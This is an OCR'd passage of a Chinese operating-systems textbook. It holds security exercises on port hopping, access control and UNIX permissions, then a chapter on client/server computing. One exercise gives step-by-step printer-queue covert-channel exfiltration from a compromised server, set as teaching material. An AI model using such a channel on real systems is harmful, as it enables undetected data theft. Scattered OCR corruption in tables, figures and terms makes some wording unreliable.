每 分 钟 都 会 从 选中 的 1000 个 端口 中 选 出 新 的 包含 16 个 端口 的 一 组 端口 。 基 于 新 算出 的 散 列 ， 
这 16 个 端口 中 的 一 个 会 用 于 连接 到 隐藏 的 服务 ， 而 其 他 15 个 会 被 监控 。 考 虑 到 时 钟 漂移 ， 任 何 时 
候 都 有 3 组 端口 ( 每 组 16 个) 是 开放 的 : 一 组 用 于 上 一 分 钟 ， 一 组 用 于 当前 这 一 分 钟 ， 一 组 用 于 下 
一 分 钟 。 

知道 端口 范围 、 服 务 名 和 密码 的 用 户 通过 运行 一 个 程序 来 获知 当前 要 连接 的 端口 号 。 然 后 ， 他 
们 就 可 以 发 出 正确 的 HTTP 请 求 了 。 例 如 , 用 http://1.2.3.4:548/ 连接 到 运行 于 IP 地 址 是 1.2.3.4 的 主 
机 的 548 端口 上 的 Web 服务 器 。 

a) 人 侵 者 幸运 地 猜 出 端口 号 ， 从 而 获得 对 Web 服务 的 访问 的 概率 是 多 少 ? 
b) 如 果 黑 名 单 在 每 次 失败 的 连接 尝试 之 后 的 15 分 钟 内 有 效 ， 人 侵 者 在 获得 访问 之 前 期 望 要 等 多 长 
时 间 ? 

不 幸 的 是 ,很 多 人 倾向 于 直接 使 用 文档 中 列 出 的 软件 配置 例子 。 假 定 shimmer 支持 16 个 字符 的 
字母 数字 密码 ， 并 且 人 侵 者 知道 shimmer 文档 总 是 使 用 10000-10999 这 个 端口 范围 和 “hidden_http” 
这 个 服务 名 ， 乐 观 估计 a) 问 中 的 概率 有 多 少 ? 

在 14.3 节 中 讨论 的 DAC 另 一 个 保护 状态 的 表现 形式 是 有 向 图 。 保 护 状态 的 每 一 个 主体 和 对 象 都 表 
示 为 一 个 节点 (单个 节点 表示 主体 和 对 象 这 样 的 实体 )， 从 主体 到 对 象 的 有 向 边 表 示 一 个 访问 权限 ， 
用 边 上 的 标记 定义 该 访问 权限 。 
a) 根据 图 12.13a 中 的 访问 控制 矩阵 画 一 个 有 向 图 ， 
b) 根据 图 15.4 中 的 访问 控制 矩阵 画 一 个 有 向 图 。 
c) 在 访问 控制 矩阵 和 有 向 图 之 间 是 和 否 有 一 一 对 应 的 关系 ?请 解释 。 
UNIX 把 文件 目录 当成 文件 一 样 处 理 , 也 就 是 通过 同样 的 数据 结构 即 索引 节点 来 定义 。 与 文件 类 似 ， 
目录 包含 一 个 9 字 节 长 度 的 保护 字符 串 。 如 果 不 在 意 ， 就 可 能 导致 访问 控制 的 问题 。 比 如 ， 一 个 保 
护 模式 为 730 (八进制 ) 的 目录 下 的 一 个 文件 的 保护 模式 为 644 ( 八进制 )， 则 在 本 例 中 该 文件 是 如 
何 折衷 保护 模式 的 ? 
在 传统 的 UNIX 文件 访问 控制 模型 中 ，UNIX 系统 为 新 建 的 文件 或 目录 提供 了 默认 设置 ， 用 户 可 以 
修改 此 设置 。 默 认 的 设置 常常 是 所 有 者 的 完全 访问 ， 加 上 以 下 几 种 情况 之 一 : 不 能 被 组 或 者 其 他 用 
户 访问 ， 组 的 读 / 执 行 权 限 ， 或 者 组 和 其 他 用 户 的 读 / 执 行 权限 。 简 要 讨论 每 种 方式 的 优点 和 缺点 ， 
包括 每 种 情况 一 个 适当 的 例子 。 
考虑 一 个 带 有 Web 服务 器 的 系统 中 的 用 户 账 号 ， 提 供用 户 Web 域 的 访问 权限 。 通 常情 况 下 ， 这 种 
机 制 使 用 标准 的 目录 名 ， 比 如 public_htm1l， 在 用 户 的 根 目 录 下 。 这 表示 用 户 的 Web 域 。 但 是 如 
果 人 允许 Web 服务 器 访问 目录 中 的 页 ， 则 至 少 需要 拥有 对 用 户 根 目录 搜索 ( 执行) 权限 ， 对 Web H 
录 的 读 / 执 行 权 限 ， 以 及 对 其 中 任何 Web 页 的 读 权 限 。 考 虑 本 例 中 需求 之 间 的 相互 影响 。 这 种 需求 
会 有 怎样 的 后 果 ? 注意 到 Web 服务 器 通常 作为 一 个 特殊 的 用 户 存在 ,处 于 和 大 部 分 用 户 不 同 的 一 个 
组 中 。 是 否 有 一 些 运行 这 种 Web 服务 根本 不 合适 的 情况 ?请 解释 。 
隐秘 虹 道 是 一 种 从 受害 计算 机 上 泄露 信息 的 低 带 宽 机 制 。 尽 管 隐秘 隧道 慢 ， 却 很 难 被 监控 软件 检测 
到 。 
假定 一 个 攻击 者 已 经 攻破 了 运行 在 物理 上 访问 不 到 的 数据 中 心 上 的 极端 安全 的 服务 器 上 的 人 
侵 检测 系统 。 服 务 器 为 一 群 很 有 安全 意识 的 资深 计算 机 用 户 提 供 网 络 文件 系统 和 打印 机 。 攻 击 者 怎 
样 才能 在 不 打开 网 络 连接 ( 那样 可 能 会 暴露 行 迹 ) 的 情况 下 ， 从 服务 器 上 把 敏感 文件 的 内 容 传送 到 
另 一 台 受 害 的 机 器 上 (或 许 攻 击 者 能 从 物理 上 访问 这 台 机 器 ) ? 
一 种 解决 方案 是 周期 性 地 操纵 打印 机 队列 : 
1) 暂停 打印 机 。 
2) 向 打印 机 队列 中 插入 特殊 命名 的 文件 。 
3) 等 一 小 段 时 间 ( 比如 5 秒 )。 
4) 从 打印 机 队列 中 删除 这 个 文件 。 
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5) 恢复 打印 机 。 
另 一 台 受 害 机 器 上 的 软件 监控 打印 机 队列 里 是 否 有 特殊 命名 的 文件 : 或 许 ClientProposal.doc 
表示 1， 而 ClientProposal_revised.doc 表示 0。 这 样 ， 攻 击 者 就 能 传送 1 位 信息 而 很 难 被 检测 到 。 
a) 如 果 每 5 分 钟 操 纵 一 次 打印 机 队列 ， 多 长 时 间 才 能 传送 完 一 个 3MB 大 小 的 文件 ? 
b) Ma) 中 的 结果 看 ， 隐 秘 隧道 好 像 没有 什么 威胁 。 但 是 ,假设 同样 是 这 个 3MB 大 小 的 文件 
被 加 密 并 被 传输 , 而 攻击 者 拥有 这 次 传输 的 一 个 拷贝 。 要 是 加 密 密 钥 放 在 服务 器 上 怎么 办 ? 
或 许 放 在 一 个 备份 集 里 会 怎样 ? 通常 认为 256 位 的 AES 密 钥 对 非常 敏感 的 数据 已 经 足够 
了 ， 而 推荐 的 PGP 密 钥 的 长 度 也 只 有 2048 位 或 4096 位 。 同 样 的 一 个 隐秘 隧道 现在 仍然 没 
有 威胁 吗 ? 
c) 怎么 利用 网 络 文件 系统 构造 一 个 类 似 的 隐秘 隧道 ? 
d) 怎么 将 一 个 看 起 来 无 害 的 纯 文本 文件 转换 成 一 个 带宽 高 得 多 的 隐秘 隧道 ”对 图 像 文 件 又 能 
怎样 进行 类 似 的 操纵 呢 ? 
15.14 在 人 侵 检测 系统 中 , 我 们 定义 误 报 率 为 在 正常 的 情况 人 侵 检 测 系 统 产 生 报警 信号 。 漏 报 率 是 在 实际 
需要 报警 的 情况 下 人 侵 检测 系统 没有 没有 报警 。 使 用 下 图 ， 分 别 画 两 条 曲线 ， 大 致 描绘 误 报 率 和 
漏 报 率 。 


报警 的 频率 


宽松 、 不 具体 稳妥 严格 、 具 体 
15.15 HSA 7.13a 中 的 函数 ,使 其 不 容易 受到 缓冲 区 溢出 攻击 。 





在 传统 情况 下 ， 数 据 处 理 功能 按照 集中 的 方式 进行 组 织 。 在 集中 的 数据 处 理 体系 结构 中 ， 数 
据 处 理 支持 是 由 位 于 一 个 集中 的 设施 中 的 一 个 或 多 个 计算 机 ，, 通常 是 大 型 机 来 提供 的 。 许 多 任务 
在 数据 处 理 中 心 集中 初始 化 并 得 出 结果 。 其 他 一 些 需要 交互 处 理 的 任务 在 物理 上 不 必 位 于 数据 处 
理 中 心 。 例 如 ,一 个 库存 更 新 的 数据 项 功能 ， 可 能 由 在 遍及 整个 组 织 的 职员 来 执行 。 而 在 集中 式 
的 体系 结构 中 ， 每 个 人 有 一 个 处 理 终端 连接 到 集中 的 数据 处 理 设施 上 。 


一 个 完全 集中 的 数据 处 理 设施 可 以 用 下 面 的 词汇 来 描述 : 

@ 集中 式 计算 机 : 一 个 或 多 个 计算 机 位 于 一 个 集中 的 设施 中 。 在 许多 情况 下 ， 这 是 指 一 个 
或 多 个 大 型 机 (mainframe computer )， 需 要 空调 、 防 静电 地 板 等 特殊 设备 。 在 一 些小 的 
组 织 中 ， 这 些 集中 的 计算 机 是 一 些 大 型 或 中 型 规模 的 小 型 机 ( minicomputer )。 比 如 IBM 
的 i 系列 ( iSeries ) 计算 机 就 是 一 种 中 型 规模 的 计算 机 系统 。 

o 集中 处 理 : 所 有 的 应 用 都 运行 在 集中 数据 处 理 设施 上 。 这 包括 明确 集中 的 应 用 和 基于 组 
织 范 围 的 应 用 ， 比 如 工资 处 理 ， 而 且 包 括 支 持 在 特定 组 织 单位 中 的 用 户 需 求 的 应 用 。 在 
后 一 种 例子 中 , 一 个 产品 设计 部 门 可 能 使 用 一 种 运行 在 集中 数据 处 理 设施 中 的 CAD AG 
包 。 

© 集中 数据 : 所 有 的 数据 都 存储 在 一 个 集中 的 文件 和 教 据 库 中 ， 有 集中 的 计算 机 进行 控制 
和 访问 。 这 包括 在 组 织 中 许多 单位 使 用 的 数据 ， 比 如 存货 清单 图 ， 也 包括 只 被 一 个 组 织 
单位 使 用 的 数据 。 对 于 后 一 种 例子 ， 市 场 部 门 可 能 需要 维护 一 个 面向 用 户 调查 的 信息 数 
据 库 。 

这 些 集中 的 组 织 方式 有 不 少 吸引 人 的 方面 。 这 涉及 处 理 和 操作 设备 、 软 件 方面 的 经 济 层 面 的 
可 扩展 性 的 考虑 。 一 个 大 的 数据 处 理 机 构 能 够 提供 专业 的 程序 员 来 满足 不 同 部 门 的 需求 。 有 效 的 
管理 能 够 包括 对 数据 处 理 设施 采购 的 控制 , 对 编程 和 数据 文件 结构 的 标准 化 规定 , 设计 和 实现 安 
全 的 策略 。 

一 个 数据 处 理 设 施 可 通过 实现 一 个 分 布 式 数据 处 理 ( Distributed Data Processing, DDP ) 策略 
来 从 集中 式 的 数据 处 理 组 织 进行 不 同 程度 的 分 离 。 一 个 分 布 式 数据 处 理 设 施 由 多 个 分 布 在 不 同 地 
方 的 更 小 规模 的 计算 机 组 成 。 分 布 的 目的 是 使 得 信息 处 理 的 操作 性 、 经 济 性 和 地 理 位 置 因素 等 更 
加 有 效 。 一 个 DDP 设施 可 包括 一 个 集中 的 设备 加 上 多 个 伴随 设备 ， 也 可 以 是 基于 对 等 形式 的 计算 
机 组 成 。 在 每 种 情况 下 ， 某 种 形式 的 互联 机 制 是 必须 的 ， 即 系统 中 的 计算 机 能 够 互联 。 正 如 集中 
数据 处 理 有 相关 的 特性 ， 一 个 DDP 设施 的 特性 主要 体现 在 分 布 式 的 计算 机 、 处 理 和 数据 上 。 

DDP 的 优势 主要 体现 在 如 下 几 个 方面 : 

e 响应 性 : 相对 于 满足 整个 组 织 的 全 中 式 设施 ， 本 地 计算 设备 能 够 更 直接 地 满足 本 地 组 织 

的 管理 需求 。 

o 有 效 性 : 对 于 多 重 互联 系统 ， 其 中 某 个 部 分 的 缺失 只 会 造成 很 小 的 影响 。 关 键 系统 和 组 

件 (比如 包含 关键 应 用 、 打 印 机 和 大 容量 存储 设备 的 计算 机 ) 可 通过 复制 来 实现 备份 ， 
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使 得 出 错 后 能 够 快速 恢复 。 

@ 资源 共享 : 用 户 可 以 共享 昂贵 的 硬件 。 数 据 文 件 可 被 集中 管理 和 维护 ， 但 不 适应 组 织 范 
围 的 访问 。 员 工 服务 ， 程 序 和 数据 库 可 在 组 织 范围 内 开发 并 分 布 在 不 同 的 地 方 。 

@ 增 量 发 展 : 在 一 个 集中 的 设施 中 ， 增 加 的 工作 量 或 新 的 应 用 通常 需要 购买 新 的 设备 和 软 
件 升级 。 这 会 增加 不 小 的 开销 。 而 且 一 个 主要 的 变化 会 带 来 对 已 有 应 用 的 转化 或 重 编程 ， 
有 可 能 导致 错误 和 性 能 下 降 的 危险 。 在 分 布 式 系统 中 ， 可 逐渐 替换 应 用 或 系统 ， 吕 免 
“all-or-nothing” 的 方法 。 而 且 如 果 把 应 用 移 到 新 机 器 上 的 花费 不 合算 ， 则 可 在 老 的 设备 
只 运行 单一 应 用 来 缓解 问题 。 

@ 增加 用 户 的 参与 和 控制 : 由 于 更 小 且 更 可 管理 的 计算 机 贴近 用 户 ， 用 户 可 通过 直接 与 技 
术 人 员 或 上 级 交互 ， 从 而 有 更 大 的 机 会 来 影响 系统 设计 和 操作 。 

© 终端 用 户 的 生产 率 : 分 布 式 系统 中 的 设备 处 理 的 一 般 是 小 任务 ， 这 使 得 分 布 式 系统 趋向 
于 给 用 户 更 快 的 响应 。 而 且 ， 分布 式 系统 设施 的 应 用 和 接口 可 根据 组 织 单位 的 需求 来 进 
行 优化 。 组 织 单 位 管理 人 员 可 评估 设施 本 地 分 配 或 优化 并 可 做 出 合适 的 改变 。 

为 实现 上 述 好 处 ， 操 作 系 统 必 须 为 DDP 提供 一 系列 的 功能 。 这 些 功 能 包括 在 机 器 间 交 换 数 

据 ， 集 群 系统 的 高 可 用 性 和 高 性 能 ， 以 及 在 分 布 式 环境 中 管理 进程 的 能 力 。 
注意 ， 第 17 章 和 18 章 在 williamstallings.com/OS/OS6e.html 网 站 上 可 以 找到 。 


第 八 部 分 导读 


第 16 章 ”分布 式 处 理 、 客 户 /服务 器 和 集群 


本 章 概 述 了 多 系统 互 操作 所 需要 的 操作 系统 支持 。 本 章 描 述 了 客户 /服务 器 的 概念 以 及 在 操 
作 系 统 中 位 置 需求 。 对 客户 /服务 器 计算 的 讨论 包括 对 实现 客户 /服务 器 系统 的 两 个 关键 机 制 : 消 
息 传递 和 远程 过 程 调用 。 本 章 也 介绍 了 集群 的 概念 。 


第 16 章 ”分布 式 处 理 、 客 户 / 服 务 器 和 集群 


本 章 将 分 析 分 布 式 软件 中 的 关键 概念 ， 包 括 客户 /服务 器 体系 结构 、 消 息 传 递 、 远 程 过 程 调 
用 。 然 后 将 分 析 日 趋 重要 的 集群 体系 结构 。 
16.1 客户 /服务 器 计算 模型 


在 信息 处 理 系统 中 ， 客 户 / 服 务 器 计算 模型 及 相关 概念 正 变 得 越 来 越 重要 。 本 节 首 先 对 客户 / 
服务 器 计算 的 基本 特征 进行 描述 ， 然 后 对 客户 /服务 器 计算 模型 的 各 种 组 织 方法 进行 讨论 ; 之 后 
介绍 因 使 用 文件 服务 器 而 产生 的 文件 高 速 缓存 一 致 性 问题 ， 最 后 将 介绍 中 间 件 的 概念 。 


16.1.1 什么 是 客户 /服务 器 计算 模型 


随 着 计算 机 领域 各 个 方面 的 新 发 展 ， 客 户 / 服 务 器 计算 模型 也 形成 了 自己 的 一 组 行业 术语 。 
表 16.1 列 出 了 一 些 术语 ， 这 些 术 语 经 常 出 现在 对 客户 /服务 器 模型 的 产品 和 应 用 的 描述 中 。 


表 16.1 客户 /服务 器 术语 一 览 表 


RB 说 OA 

应 用 程序 编程 接口 (API) 一 组 允许 客户 和 服务 器 之 间 相 互通 信 的 函数 和 可 调用 程序 的 集合 

enim 一 个 网 络 上 的 信息 请 求 方 ， 通 常 是 一 台 PC 或 工作 站 ， 能 够 从 服务 器 处 查询 数据 库 
和 其 他 信息 

中 间 件 一 组 驱动 程序 、 应 用 程序 编程 接口 或 用 于 改善 客户 应 用 程序 和 服务 器 之 间 的 连通 性 
关系 的 其 他 软件 

关系 数据 库 一 种 把 对 信息 的 访问 限制 于 满足 搜索 条 件 的 数据 行 的 数据 库 

服务 器 一 台 计 算 机 ， 通 常 是 一 台 高 性 能 工作 站 、 小 型 计算 机 或 大 型 机 ， 存 储 并 提供 信息 给 
网 络 中 的 众多 客户 使 用 

由 IBM 开发 、 由 ANSI 标准 化 的 一 种 语言 ， 用 于 对 关系 数据 库 的 寻 址 、 创 建 、 更 新 


结构 化 查询 语言 (SQL ) 和 查询 


图 16.1 用 以 说 明 客 户 / 服 务 器 概念 的 基本 含义 。 正 如 其 名 , 客户 /服务 器 模型 环境 中 的 基本 元 
索 是 客户 机 和 服务 器 。 客 户 机 通常 是 单 用 户 PC 或 工作 站 ， 为 终端 用 户 提供 友好 的 界面 。 客 户 方 
终端 目前 通常 采用 用 户 感到 最 为 舒适 的 图 形 界 面 ， 包 括 窗 口 (windows) 和 鼠标 。 这 种 典型 界面 
的 例子 包括 微软 的 Windows 操 作 系 统 和 Macintosh 操作 系 
统 提 供 的 接口 。 客 户 方 应 用 程序 都 力求 易于 使 用 , 它 包括 
了 像 电子 数据 表格 这 样 的 一 些 常 用 工具 。 

客户 /服务 器 环境 中 的 每 台 服 务 器 为 客户 机 提供 一 系 
列 的 共享 信息 服务 。 当 前 最 常见 的 服务 器 类 型 是 数据 库 服 
务 器 , 该 服务 器 上 运行 着 一 个 关系 数据 库 。 服务器 使 很 多 
客户 机 共享 对 同一 数据 闫 的 访问 , 且 利 用 高 性 能 计算 机 系 
统 支 持 对 数据 库 进行 管理 。 mean 

除了 客户 端 机 器 和 服务 器 ， 组 成 客户 /服务 器 环境 的 图 16.1 通用 的 客户 /服务 器 环境 





服务 器 
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第 三 个 基本 要 素 是 网 络 ， 客 户 /服务 器 计算 是 典型 的 分 布 式 计算 。 因 为 用 户 、 应 用 程序 和 资源 是 
按照 实际 业务 的 需求 分 散在 各 处 的 ， 它 们 之 间 通 过 局 域 网 、 广 域 网 或 因特网 连接 起 来 。 
客户 /服务 器 的 配置 模型 与 其 他 分 布 式 处 理 方案 有 何不 同 呢 ? 客户 /服务 器 模式 有 许多 突出 
的 特点 ， 所 有 这 些 特点 结合 在 一 起 ， 使 得 客户 /服务 器 模式 与 传统 的 分 布 处 理 有 很 大 的 不 同 : 
© 在 用 户 的 本 地 系统 上 为 该 用 户 提供 界面 友好 的 应 用 程序 ， 这 样 做 使 系统 具有 更 高 的 可 靠 
性 。 这 使 得 用 户 可 以 在 很 大 程度 上 控制 对 计算 机 的 使 用 方式 和 时 间 ， 并 使 得 部 门 级 管理 
者 具有 响应 本 地 需求 的 能 力 。 
@ 尽管 应 用 是 分 散 开 的 ,但 仍然 强调 公司 数据 库 的 集中 以 及 很 多 网 络 管理 和 使 用 功能 的 集 
中 。 这 使 公司 的 管理 能 够 对 计算 信息 系统 的 投资 总 额 进行 总 体 控制 ， 并 提供 互 操 作 ， 以 
使 多 系统 能 够 配合 起 来 。 同时 , 减轻 了 各 部 门 和 单位 维护 这 些 复 杂 的 计算 机 设施 的 开销 ， 
使 他 们 能 够 选择 他 们 需要 的 各 种 类 型 的 机 器 和 接口 来 访问 那些 数据 和 信息 。 
@ 对 于 用 户 组 织 和 厂商 来 说 ， 他 们 有 一 个 共同 的 承诺 事项 ， 即 使 系统 开放 和 模块 化 。 这 意 
味 着 用 户 在 选择 产品 和 混合 使 用 来 自 众 多 厂商 的 设备 时 具有 很 大 的 选择 性 。 
o 网 络 互联 是 操作 的 基础 ,网 络 管理 和 网 络 安全 在 组 织 和 操作 信息 系统 中 具有 很 高 的 优先 权 。 


16.12 ”客户 /服务 器 模型 的 应 用 


客户 /服务 器 模型 结构 的 主要 特点 是 应 用 程序 级 的 任务 在 客户 机 和 服务 器 之 间 的 分 配 。 图 
16.2 给 出 了 一 个 通用 的 例子 。 无 论 是 在 客户 机 还 是 在 服务 器 
中 ,最 基本 的 软件 当然 是 运行 在 硬件 平台 上 的 操作 系统 。 客 
户 机 与 服务 器 在 硬件 平台 和 操作 系统 上 可 能 有 所 不 同 。 实 际 
E, 在 独立 的 环境 中 ,可 能 会 有 很 多 种 不 同类 型 的 客户 机 平 
台 和 操作 系统 以 及 很 多 种 不 同类 型 的 服务 器 平台 和 操作 系 
统 。 只 要 特定 的 客户 机 和 服务 器 共享 相同 的 通信 协议 并 支持 
相同 的 应 用 程序 ， 这 些 低 层 的 区 别 就 没什么 关系 。 

使 客户 和 服务 器 能 够 交互 的 基础 是 通信 软件 ， 这 种 软件 
的 主要 例子 是 TCP/IP。 很 显然 ,所 有 这 些 支 持 软件 ( 通信 软 
件 和 操作 系统 ) 的 主要 任务 ， 是 为 分 布 式 的 应 用 程序 提供 一 
个 基本 结构 。 在 理论 上 , 应 用 程序 所 执行 的 实际 功能 可 以 针对 客户 和 服务 器 而 分 割 开 来 , 方法 是 
使 平台 和 网 络 资源 达到 最 优化 ,在 某 些 情况 下 ,这 些 都 要 求 大 量 的 应 用 程序 软件 在 服务 器 上 执行 ， 
而 在 其 他 一 些 情况 下 ， 多 数 应 用 程序 逻辑 上 位 于 客户 端 。 

客户 /服务 器 环境 能 够 成 功 的 一 个 基本 因素 是 用 户 将 系统 当做 一 个 整体 而 与 之 打交道 的 方 
式 。 所 以 ， 客 户 端 机 器 的 用 户 界 面 的 设计 是 非常 关键 的 。 在 大 多 数 客户 /服务 器 系统 中 ， 都 突出 
强调 了 要 提供 易于 使 用 、 易 于 学 习 、 功 能 强大 并 且 灵 活 的 图 形 用 户 界 商 (GUI )。 因 此 我 们 可 以 
认为 ， 客 户 工作 站 上 的 表示 服务 模块 负责 为 环境 中 的 分 布 式 应 用 程序 提供 友好 的 用 户 界面 。 


数据 库 应 用 

为 了 说 明 在 客户 机 和 服务 器 之 间 分 割 应 用 程序 逻辑 的 概念 ， 考 虑 客户 /服务 器 应 用 中 最 常见 
的 一 种 情况 : 使 用 关系 数据 库 。 在 该 环境 中 ,服务 器 基本 上 是 一 个 数据 库 服 务 器 ,客户 和 服务 器 
之 间 交 互 的 形式 是 客户 向 数据 库 发 送 请 求 和 接收 数据 库 响 应 的 事务 操作 。 

图 16.3 描述 了 这 样 一 个 系统 的 结构 ， 由 服务 器 负责 维护 数据 库 。 为 了 做 到 这 一 点 ， 需 要 复 
杂 的 数据 库 管 理 系统 软件 模块 。 在 客户 机 上 有 各 种 不 同 的 使 用 数据 库 的 应 用 程序 。 将 客户 和 服务 
器 维系 在 一 起 的 是 能 使 客户 做 出 访问 服务 器 上 的 数据 库 请 求 的 支持 软件 。 这 种 软件 目前 的 一 个 典 
型 的 例子 是 结构 化 查询 语言 (SQL )。 





16.2 通用 的 客户 /服务 器 体系 结构 
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图 16.3 显示 了 所 有 的 应 用 程序 逻辑 (解析 数据 的 含义 或 进行 其 他 类 型 的 数据 分 析 ) 都 在 客户 
方 , 而 服务 器 只 负责 管理 数据 库 。 这 样 一 种 配置 方 
式 是 否 合理 , 取决 于 应 用 程序 的 类 型 和 目的 。 例 如 ， ,客户 工作 站 
假设 数据 库 应 用 的 主要 目的 是 提供 对 记录 查找 的 
FER], E 16.4a 说 明了 它 是 如 何 工 作 的 。 假 设 
服务 器 正在 维护 的 数据 库 具 有 100 万 条 记录 ( 在 关 
系数 据 库 中 称 为 行 )， 用 户 想 执行 查找 操作 ， 结 果 
可 能 是 零 条 、 一 条 或 若干 条 记录 。 用 户 在 搜索 这 些 js 
记录 时 可 以 使 用 多 种 查询 条 件 ( 例如 ，1992 年 以 : ee am 
前 的 记录 ,涉及 俄亥俄 州 中 的 记录 , 涉及 某 一 特定 
的 事物 或 特性 的 记录 ， 等 等 )。 第 一 个 客户 查询 可 16.3 ”数据 库 应 用 的 客户 /服务 器 体系 结构 
能 导致 服务 器 的 响应 为 : 有 10 万 条 记录 满足 搜索 条 件 。 然 后 用 户 添加 了 另外 的 限定 词 ， 并 发 出 
新 的 查询 ， 这 一 次 ， 从 响应 的 情况 可 以 看 出 返回 了 1000 条 可 能 的 记录 。 最 后 ， 客 户 又 发 出 了 具 
有 附加 限定 词 的 第 三 个 请 求 ， 这 次 搜索 产生 了 单条 匹配 的 记录 ， 该 条 记录 返回 给 客户 机 。 











第 一 次 查询 
10 万 条 可 能 的 记录 客户 
客户 第 二 次 查询 _， ff 查询 i 
1000 条 可 能 的 记录 > G 返回 30 万 条 记录 
G 最 后 一 次 查询 ， Y S 
4 返回 一 条 记录 100 万 条 
记录 的 数 
a) 期 望 的 客户 /服务 器 使 用 方式 据 库 b) 未 使 用 客户 /服务 器 的 方式 


图 16.4 客户 /服务 器 的 数据 库 使 用 


前 述 的 应 用 非常 适合 使 用 客户 /服务 器 结构 主要 有 两 个 原因 : 
1) 排序 和 搜索 数据 库 的 工作 量 巨大 ， 需 要 大 容量 磁盘 或 磁盘 阵列 、 高 速 CPU 以 及 高 速 VO 
. 结构 。 这 样 的 容量 和 处 理 能 力 不 是 必需 的 ， 且 对 于 单 用 户 工作 站 和 PC 来 说 也 太 昂 贵 了 。 
2) 将 整个 100 万 条 记录 的 文件 拷贝 到 客户 机 上 用 于 搜索 ， 这 将 带 来 太 大 的 网 络 传输 负担 ， 
因此 ， 对 于 服务 器 来 说 ， 仅 能 代表 客户 机 执行 记录 检索 是 不 够 的 ; 服务 器 需要 具有 数据 
库 逻 辑 ， 使 它 能 够 代表 客户 机 的 逻辑 来 执行 搜索 。 
现在 我 们 来 看 图 16.4b 的 情形 ， 它 也 是 拥有 100 万 条 记录 的 数据 库 。 在 这 种 情况 下 ， 一 个 查 
询 导 致 了 30 万 条 记录 在 网 络 上 传输 。 这 种 情况 的 发 生 可 能 是 用 户 想 要 通过 很 多 记录 甚至 是 整个 
数据 库 来 得 到 某 些 域 的 全 部 或 平均 值 。 
BR, 后 面 一 种 情形 是 不 能 接受 的 ， 在 保持 客户 /服务 器 结构 所 有 优点 的 前 提 下 ， 解决 这 个 
问题 的 一 个 方法 是 将 部 分 应 用 程序 逻辑 转移 到 服务 器 上 。 也 就 是 说 , 服务 器 配置 为 具有 执行 数据 
分 析 、 数 据 恢复 和 数据 搜索 的 应 用 程序 逻辑 。 


客户 /服务 器 应 用 程序 的 分 类 

在 客户 /服务 器 的 通用 框架 中 ， 对 客户 和 服务 器 的 工作 划分 有 许多 不 同 的 实现 方法 。 图 16.5 
说 明了 可 以 以 多 种 方式 来 分 配 处 理 过 程 , 图 中 概括 了 数据 库 应 用 的 一 些 主要 选项 。 也 可 能 存在 其 
他 的 划分 方法 ,并 且 对 于 其 他 不 同类 型 的 应 用 也 可 能 具有 不 同 的 特点 。 不 过 ,分析 这 张 图 以 了 解 
一 些 划 分 方法 都 是 有 用 的 。 

图 16.5 描述 了 四 种 类 型 : 

o 基于 主机 的 处 理 : 基于 主机 的 处 理 不 是 真正 的 人 们 普遍 认同 的 客户 /服务 器 计算 模型 。 而 
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且 ， 基 于 主机 的 处 理 是 指 传统 的 大 型 机 环境 ， 在 这 种 情况 下 所 有 的 处 理 都 是 在 一 台中 心 
主机 上 完成 的 。 与 用 户 接口 常常 是 通过 一 台 碰 终端 ， 即 使 用 户 在 使 用 的 是 一 人 台 微 机 ， 用 
户 终端 一 般 也 仅 限 于 充当 终端 仿真 器 。 客户 服务 器 

o 基于 服务 器 的 处 理 : 最 基本 的 一 类 客户 /服务 器 的 wis 
配置 是 ， 客 户 端 主要 负责 提供 图 形 用 户 界 面 ， 而 
实质 上 所 有 的 处 理 都 是 在 服务 器 上 完成 的 。 这 种 
配置 是 典型 的 早期 客户 /服务 器 模式 ， 常 运用 于 部 a) 基于 主机 的 处 理 
门 级 的 系统 。 这 种 配置 的 基本 原理 是 用 户 工 作 站 
最 适宜 于 提供 良好 的 用 户 界面 ， 并 且 数 据 库 和 应 。 | 各 
用 程序 很 容易 在 中 心 系 统 上 维护 。 尽 管用 户 获 得 
了 良好 界面 的 好 处 ， 但 是 ， 这 种 配置 类 型 并 不 总 








能 有 效 提 高 处 理 效 率 或 系统 支持 的 实际 商业 功能 b) 基于 服务 器 处 理 
上 有 本 质 的 改变 。 

o 基于 客户 的 处 理 : 在 另 一 个 极端 , 所 有 应 用 的 实际 eee | ST 
处 理 可 能 全 部 在 客户 端 完成 , 除了 最 适合 在 服务 器 
上 执行 的 数据 校 验 功能 和 其 他 数据 库 逻 辑 功能 。 一 | 
般 地 ， 某 些 更 复杂 的 数据 库 逻 辑 功 能 都 位 于 客户 c) 合作 处 理 


端 。 这 种 结构 可 能 是 当今 使 用 最 普遍 的 客户 /服务 
器 方式 ， 它 使 用 户 能 够 使 用 适应 本 地 需要 的 应 用 。 
@ 合作 处 理 : 在 合作 处 理 配置 方式 中 , 应 用 处 理 是 以 
最 优化 的 方式 来 执行 的 , 充分 利用 了 客户 和 服务 器 Lo 
两 方面 的 优势 以 及 数据 的 分 布 性 。 这样 一 种 配置 在 D 基于 客户 的 处 理 
设置 和 维护 方面 更 加 复杂 , 但 从 长 远 来 看 , 这 种 配 ”图 16.5 客户 /服务 器 应 用 程序 的 分 类 
置 类 型 可 以 比 其 他 客户 /服务 器 方式 为 用 户 提供 更 高 的 生产 效率 和 更 高 的 网 络 效率 。 
图 16.5c 和 图 16.5d 对 应 的 配置 情况 是 在 客户 端 上 有 相当 大 的 一 部 分 处 理 负载 。 这 种 所 谓 的 
胖 客 户 端 ( fat client) 模型 随 着 一 些 开 发 工具 的 运用 变 得 普及 开 来 ， 例 如 Sybase 公司 的 
PowerBuilder 和 Gupta 公司 的 SQL Windows。 使 用 这 些 工 具 开 发 的 应 用 都 是 典型 的 部 门 级 运用 ， 
支持 25 到 150 个 用 户 [ ECKE95 ]。 胖 客户 端 模型 的 主要 优点 是 它 充分 利用 了 桌面 功能 ， 分 担 了 
服务 器 上 的 应 用 处 理 并 使 它们 更 加 有 效 ， 不 容易 产生 瓶颈 。 
然而 , 胖 客 户 端 策略 也 存在 一 些 缺 点 ,新 增加 的 功能 很 快 就 超出 了 桌面 机 器 的 处 理 能 力 ,， 38 
使 公司 进行 升级 。 如 果 模 型 扩充 超出 了 部 门 的 界限 , 合并 了 很 多 用 户 , 则 公司 必须 安装 高 容量 局 
域 网 来 支持 在 瘦 服 务 器 和 胖 客 户 端 之 间 进 行 大量 的 传输 。 最后, 维护、 升级 或 替换 分 布 于 数 十 台 
或 数 百 台 桌 面 机 的 应 用 程序 将 变 得 非常 困难 。 
16.5b RR T —A BEA (thin client) HARK, 这 种 方式 更 近似 地 模仿 了 传统 的 以 主机 
